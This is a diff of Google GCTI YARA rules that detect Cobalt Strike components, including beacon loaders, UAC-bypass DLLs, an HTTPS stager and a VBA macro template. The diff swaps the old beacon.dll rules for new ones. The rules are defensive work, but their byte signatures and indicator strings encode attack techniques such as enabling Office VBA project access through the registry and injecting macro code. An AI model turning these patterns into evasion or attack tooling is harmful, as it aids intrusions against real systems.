-		$decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 }
+		$core_sig = {
+      C6 45 EC 4D
+      C6 45 ED 61
+      C6 45 EE 70
+      C6 45 EF 56
+      C6 45 F0 69
+      C6 45 F1 65
+      C6 45 F2 77
+      C6 45 F3 4F
+      C6 45 F4 66
+      C6 45 F5 46
+      C6 45 F6 69
+      C6 45 F7 6C
+      C6 45 F8 65
+      C6 45 F9 00
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_46
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X86_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 1.46"
+		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "79715042-1963-5e48-8b64-7d915da58d84"
+		id = "5f89c4be-f4c5-54d3-b923-d125de53902f"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L86-L115"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L114-L194"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "44e34f4024878024d4804246f57a2b819020c88ba7de160415be38cd6b5e2f76"
-		logic_hash = "1a5c63c8b5527c0442830a73ded8458cf82a9d8ecb9b31e9a02c10b27ed6195e"
+		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
+		logic_hash = "19b2297986bd72204fb117560cddcfb512f5db6c157d9730b5802bf9f968eef4"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 8B F2 83 F9 0C 0F 87 8E 00 00 00 FF 24 }
-		$decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 }
+		$core_sig = {
+      C6 45 B0 56
+      C6 45 B1 69
+      C6 45 B2 72
+      C6 45 B3 74
+      C6 45 B4 75
+      C6 45 B5 61
+      C6 45 B6 6C
+      C6 45 B7 41
+      C6 45 B8 6C
+      C6 45 B9 6C
+      C6 45 BA 6F
+      C6 45 BB 63
+      C6 45 BC 00
+    }
+		$deobfuscator = {
+      8B 4D FC
+      83 C1 01
+      89 4D FC
+      8B 55 FC
+      3B 55 0C
+      73 19
+      0F B6 45 10
+      8B 4D 08
+      03 4D FC
+      0F BE 11
+      33 D0
+      8B 45 08
+      03 45 FC
+      88 10
+      EB D6
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_47
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X86_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 1.47"
+		description = "Cobalt Strike's sleeve/BeaconLoader.x86.o Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "ac2249a9-210c-581f-8dd1-7619356dca7d"
+		id = "32a47966-f3bb-52c3-a977-82a1b09ddf2c"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L117-L144"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L196-L276"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "8ff6dc80581804391183303bb39fca2a5aba5fe13d81886ab21dbd183d536c8d"
-		logic_hash = "8c463d3122f3f79ff5d9b88e3d4f5ed14e6c581edfdfafba8a0c596c494ac1b1"
+		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
+		logic_hash = "cab5441ce7d919101fc04aa469e77b71a4c444443e44c752f18cbbc5b17ed5c2"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 83 F8 12 77 10 FF 24 }
-		$decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 }
+		$core_sig = {
+      C6 45 B0 56
+      C6 45 B1 69
+      C6 45 B2 72
+      C6 45 B3 74
+      C6 45 B4 75
+      C6 45 B5 61
+      C6 45 B6 6C
+      C6 45 B7 41
+      C6 45 B8 6C
+      C6 45 B9 6C
+      C6 45 BA 6F
+      C6 45 BB 63
+      C6 45 BC 00
+    }
+		$deobfuscator = {
+      8B 4D FC
+      83 C1 01
+      89 4D FC
+      8B 55 FC
+      3B 55 0C
+      73 19
+      0F B6 45 10
+      8B 4D 08
+      03 4D FC
+      0F BE 11
+      33 D0
+      8B 45 08
+      03 45 FC
+      88 10
+      EB D6
+    }
 
 	condition:
-		all of them
+		$core_sig and not $deobfuscator
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_48
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X64_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 1.48"
+		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x64.o (HeapAlloc) Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "dd15099f-ad19-58df-9ed4-ce66d7ee8540"
+		id = "9b16ff13-2d8e-51dc-9f99-6c45eff76feb"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L146-L178"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L281-L323"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "dd4e445572cd5e32d7e9cc121e8de337e6f19ff07547e3f2c6b7fce7eafd15e4"
-		logic_hash = "3f789eaf334c9bb3236d2834f38156aa92b22a5b674450977086378d195dd216"
+		hash = "d64f10d5a486f0f2215774e8ab56087f32bef19ac666e96c5627c70d345a354d"
+		logic_hash = "b712a0c218e473f6c64fdead22b291d7fb0bac8ba614adcf1ba6431e854a5e65"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F1 8B DA 83 F8 17 77 12 FF 24 }
-		$decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 }
+		$core_sig = {
+      C6 44 24 38 48
+      C6 44 24 39 65
+      C6 44 24 3A 61
+      C6 44 24 3B 70
+      C6 44 24 3C 41
+      C6 44 24 3D 6C
+      C6 44 24 3E 6C
+      C6 44 24 3F 6F
+      C6 44 24 40 63
+      C6 44 24 41 00
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_49
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X64_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 1.49"
+		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x64.o (MapViewOfFile) Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "871e28c9-b580-5a32-8529-2290ded1a1b6"
+		id = "38e063db-3d76-5a94-812a-945fcf46a232"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L180-L211"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L326-L374"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "52b4bd87e21ee0cbaaa0fc007fd3f894c5fc2c4bae5cbc2a37188de3c2c465fe"
-		logic_hash = "935232d5ddccdc0401b4d911cdc73a48305347b495219c8c893615fe918f32f1"
+		hash = "9d5b6ccd0d468da389657309b2dc325851720390f9a5f3d3187aff7d2cd36594"
+		logic_hash = "6224000342d87041fd3336656897479c644e94ea36fc061c27fcd64233047c2c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 56 83 F8 1E 0F 87 23 01 00 00 FF 24 }
-		$decoder = { B1 ?? 90 30 88 [4] 40 3D A8 01 00 00 7C F2 }
+		$core_sig = {
+      C6 44 24 58 4D
+      C6 44 24 59 61
+      C6 44 24 5A 70
+      C6 44 24 5B 56
+      C6 44 24 5C 69
+      C6 44 24 5D 65
+      C6 44 24 5E 77
+      C6 44 24 5F 4F
+      C6 44 24 60 66
+      C6 44 24 61 46
+      C6 44 24 62 69
+      C6 44 24 63 6C
+      C6 44 24 64 65
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_0_49
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X64_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Version 2.0.49"
+		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "087c584a-5ceb-536a-8842-53fbd668df54"
+		id = "8ca04f82-a8a8-5162-8b0c-8a7bce678a85"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L213-L243"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L376-L456"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ed08c1a21906e313f619adaa0a6e5eb8120cddd17d0084a30ada306f2aca3a4e"
-		logic_hash = "3616579dabcfd0ba413d17b4fbd0da5313b9beca94f7bf8e41f05d6679b4a215"
+		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
+		logic_hash = "17402e952d71d02274a9b2814512b28a402e8d11a6c2a2375844fe24719f87a6"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 83 F8 22 0F 87 96 01 00 00 FF 24 }
-		$decoder = { B1 ?? EB 03 8D 49 00 30 88 [4] 40 3D 30 05 00 00 72 F2  }
+		$core_sig = {
+      C6 44 24 48 56
+      C6 44 24 49 69
+      C6 44 24 4A 72
+      C6 44 24 4B 74
+      C6 44 24 4C 75
+      C6 44 24 4D 61
+      C6 44 24 4E 6C
+      C6 44 24 4F 41
+      C6 44 24 50 6C
+      C6 44 24 51 6C
+      C6 44 24 52 6F
+      C6 44 24 53 63
+      C6 44 24 54 00
+    }
+		$deobfuscator = {
+      8B 04 24
+      FF C0
+      89 04 24
+      8B 44 24 28
+      39 04 24
+      73 20
+      8B 04 24
+      0F B6 4C 24 30
+      48 8B 54 24 20
+      0F BE 04 02
+      33 C1
+      8B 0C 24
+      48 8B 54 24 20
+      88 04 0A
+    }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_1_And_V2_2
+rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X64_O_V4_3_V4_4_V4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 2.1 and 2.2"
+		description = "Cobalt Strike's sleeve/BeaconLoader.x64.o (Base) Versions 4.3 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "384fb247-aae7-52e1-a45d-6bda0f80a04e"
+		id = "07f751e4-f001-5b95-b229-31fbaa867cea"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L245-L276"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L458-L555"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ae7a1d12e98b8c9090abe19bcaddbde8db7b119c73f7b40e76cdebb2610afdc2"
-		logic_hash = "eee3702d6fde08b8e9f5533f903fa33fb3da808a3b76ca43e4d5029f9ce91ad0"
+		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
+		logic_hash = "50d9da466e2c074b3fb634203c8840d45da8f8e3094790d7c4354a5703b583ef"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 49 56 57 83 F9 24 0F 87 8A 01 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$core_sig = {
+      33 C0
+      83 F8 01
+      74 63
+      48 8B 44 24 20
+      0F B7 00
+      3D 4D 5A 00 00
+      75 45
+      48 8B 44 24 20
+      48 63 40 3C
+      48 89 44 24 28
+      48 83 7C 24 28 40
+      72 2F
+      48 81 7C 24 28 00 04 00 00
+      73 24
+      48 8B 44 24 20
+      48 8B 4C 24 28
+      48 03 C8
+      48 8B C1
+      48 89 44 24 28
+      48 8B 44 24 28
+      81 38 50 45 00 00
+      75 02
+    }
+		$deobfuscator = {
+      8B 04 24
+      FF C0
+      89 04 24
+      8B 44 24 28
+      39 04 24
+      73 20
+      8B 04 24
+      0F B6 4C 24 30
+      48 8B 54 24 20
+      0F BE 04 02
+      33 C1
+      8B 0C 24
+      48 8B 54 24 20
+      88 04 0A
+    }
 
 	condition:
-		all of them
+		$core_sig and not $deobfuscator
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_3
+rule GCTI_Cobaltstrike_Resources_Elevate_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_Dll_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 2.3"
+		description = "Cobalt Strike's resources/elevate.dll signature for v3.0 to v3.14 and sleeve/elevate.dll for v4.x"
 		author = "gssincla@google.com"
-		id = "aed092f1-fbb1-5efe-be8d-fb7c5aba1cde"
+		id = "170f62a2-ba4f-5be8-9ec5-402eb7bbde4e"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L278-L308"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_Dll_v4_x.yara#L17-L68"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "00dd982cb9b37f6effb1a5a057b6571e533aac5e9e9ee39a399bb3637775ff83"
-		logic_hash = "286d7ffa83634b82160788abaf1c5b319a09c4a1243af2401799f327be76ad75"
+		hash = "6deeb2cafe9eeefe5fc5077e63cc08310f895e9d5d492c88c4e567323077aa2f"
+		logic_hash = "766a0a390ed8cefe43d82a054a9b2cfec7eced75e0d7ee10231215043577b75e"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 49 56 57 83 F9 26 0F 87 A9 01 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$wnd_proc = {
+			6A 00
+			6A 28
+			68 00 01 00 00
+			5?
+			C7 [5] 01 00 00 00
+			FF ??
+			6A 00
+			6A 27
+			68 00 01 00 00
+			5?
+			FF ??
+			6A 00
+			6A 00
+			68 01 02 00 00
+			5?
+			FF ??
+		}
 
 	condition:
-		all of them
+		$wnd_proc
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_4
+rule GCTI_Cobaltstrike_Resources_Bypassuac_Dll_V1_49_To_V3_14_And_Sleeve_Bypassuac_Dll_V4_0_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 2.4"
+		description = "Cobalt Strike's resources/bypassuac(-x86).dll from v1.49 to v3.14 (32-bit version) and sleeve/bypassuac.dll from v4.0 to at least v4.4"
 		author = "gssincla@google.com"
-		id = "347a6b06-84a8-53ff-80a1-05fa1a48a412"
+		id = "614046b5-cf81-56a5-8824-b3a7e14a8ed5"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L310-L340"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_Dll_v1_49_to_v3_14_and_Sleeve_Bypassuac_Dll_v4_0_to_v4_x.yara#L17-L94"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "78c6f3f2b80e6140c4038e9c2bcd523a1b205d27187e37dc039ede4cf560beed"
-		logic_hash = "087ec6f585e90b84c00e746beb37cb8365cb7b4d07ebd0c48e3ba3d5df94dba2"
+		hash = "91d12e1d09a642feedee5da966e1c15a2c5aea90c79ac796e267053e466df365"
+		logic_hash = "7d59c0286f1936e386519a919472d01581b68a8167c89bd3cd3108d45251119a"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 4A 56 57 83 FA 2F 0F 87 F9 01 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$deleteFileCOM = {
+			A1 [4]
+			6A 00
+			8B ??
+			5?
+			5?
+			FF ?? 48
+			85 ??
+			75 ??
+			A1 [4]
+			5?
+			8B ??
+			FF ?? 54
+		}
+		$copyFileCOM = {
+			A1 [4]
+			6A 00
+			FF [2]
+			8B ??
+			FF [5]
+			FF [5]
+			5?
+			FF ?? 40
+			85 ??
+			[2 - 6]
+			A1 [4]
+			5?
+			8B ??
+			FF ?? 54
+		}
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_5
+rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 2.5"
+		description = "Cobalt Strike's resources/btemplate.vbs signature for versions v3.3 to v4.x"
 		author = "gssincla@google.com"
-		id = "a89f9239-099c-5b97-b1df-e8ce2b95ea52"
+		id = "62f35d02-1e4e-5651-b575-888ce06b8bdd"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-22"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L342-L372"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Vbs_v3_3_to_v4_x.yara#L17-L41"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d99693e3e521f42d19824955bef0cefb79b3a9dbf30f0d832180577674ee2b58"
-		logic_hash = "f2d0ca1414a60bf855543d99777ae5e83c451db41aba5e255e4c10b1e0bb7b47"
+		hash = "e0683f953062e63b2aabad7bc6d76a78748504b114329ef8e2ece808b3294135"
+		logic_hash = "c9df0e287eb0eacf7c6cfcf3f6d1043ae6f2fdacd3b22bd42ac71f4b0d7226ff"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F2 83 F8 3A 0F 87 6E 02 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$ea = "Excel.Application" nocase
+		$vis = "Visible = False" nocase
+		$wsc = "Wscript.Shell" nocase
+		$regkey1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" nocase
+		$regkey2 = "\\Excel\\Security\\AccessVBOM" nocase
+		$regwrite = ".RegWrite" nocase
+		$dw = "REG_DWORD"
+		$code = ".CodeModule.AddFromString"
+		$ao = { 41 75 74 6f 5f 4f 70 65 6e }
+		$da = ".DisplayAlerts"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_0
+rule GCTI_Cobaltstrike_Resources_Httpsstager_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.0"
+		description = "Cobalt Strike's resources/httpsstager.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "132a1be8-f529-5141-ba03-fdf6df3d55d4"
+		id = "f45aa40a-3936-50f9-a60e-de7181862d19"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L374-L404"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager_Bin_v2_5_through_v4_x.yara#L17-L95"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "30251f22df7f1be8bc75390a2f208b7514647835f07593f25e470342fd2e3f52"
-		logic_hash = "951f1b52c14010261022f9f920d53d3c1e88f41461798a23e72083c981f9de76"
+		hash = "5ebe813a4c899b037ac0ee0962a439833964a7459b7a70f275ac73ea475705b3"
+		logic_hash = "d2f722809a59faf8ecd85e46eadf58bf23ba5f515ad9c949843f1e6bfeec1fbf"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 48 57 8B F2 83 F8 3C 0F 87 89 02 00 00 FF 24 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$InternetSetOptionA = {
+			6A 04
+			5?
+			6A 1F
+			5?
+			68 75 46 9E 86
+			FF
+		}
 
 	condition:
-		all of them
+		$apiLocator and $InternetSetOptionA
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_1
+rule GCTI_Cobaltstrike_Resources_Bypassuactoken_Dll_V3_11_To_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.1"
+		description = "Cobalt Strike's resources/bypassuactoken.dll from v3.11 to v3.14 (32-bit version)"
 		author = "gssincla@google.com"
-		id = "aa511dee-69ea-53bd-be90-d2d03d08c550"
+		id = "b9f25fa5-bd1d-5ba0-9b1d-bb97e1dbf76b"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L406-L461"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_Dll_v3_11_to_v3_14.yara#L17-L151"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "4de723e784ef4e1633bbbd65e7665adcfb03dd75505b2f17d358d5a40b7f35cf"
-		logic_hash = "2d91add3aefe69b4525f93f7ea9f2fcbd7a6c506a224997ff73a2eeef63a8cd4"
+		hash = "df1c7256dfd78506e38c64c54c0645b6a56fc56b2ffad8c553b0f770c5683070"
+		logic_hash = "fe0780b7f4c16b55cfa00ea7de4da8ce349ec8a72de763b72e816ebc8e934b6d"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$version_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 }
-		$decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 }
+		$isHighIntegrityProcess = {
+			5?
+			5?
+			5?
+			8B ??
+			6A 19
+			5?
+			FF 15 [4]
+			85 C0
+			75 ??
+			FF 15 [4]
+			83 ?? 7A
+			75 ??
+			FF [2]
+			5?
+			FF 15 [4]
+			8B ??
+			8D [2]
+			5?
+			FF [2]
+			5?
+			6A 19
+			5?
+			FF 15 [4]
+			85 C0
+			74 ??
+			FF ??
+			FF 15 [4]
+			8A ??
+			FE C8
+			0F B6 C0
+			5?
+			FF ??
+			FF 15 [4]
+			B? 01 00 00 00
+			5?
+			81 ?? 00 30 00 00
+		}
+		$executeTaskmgr = {
+			6A 3C
+			8D ?? C4
+			8B ??
+			6A 00
+			5?
+			8B ??
+			E8 [4]
+			83 C4 0C
+			C7 [2] 3C 00 00 00
+			8D [2]
+			C7 [2] 40 00 00 00
+			C7 [6]
+			C7 [2] 00 00 00 00
+			5?
+			C7 [2] 00 00 00 00
+			C7 [6]
+			C7 [2] 00 00 00 00
+			FF 15 [4]
+			FF 75 FC
+		}
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_2
+rule GCTI_Cobaltstrike_Resources_Artifact32_And_Resources_Dropper_V1_49_To_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/beacon.dll Versions 3.2"
+		description = "Cobalt Strike's resources/artifact32{.exe,.dll,big.exe,big.dll} and resources/dropper.exe signature for versions 1.49 to 3.14"
 		author = "gssincla@google.com"
-		id = "3ccbc0f2-241c-5c10-8930-4a3d264d3b57"
+		id = "243e3761-cbea-561c-97da-f6ba12ebc7ee"
 		date = "2022-11-18"
-		modified = "2023-12-04"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L463-L528"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L17-L32"
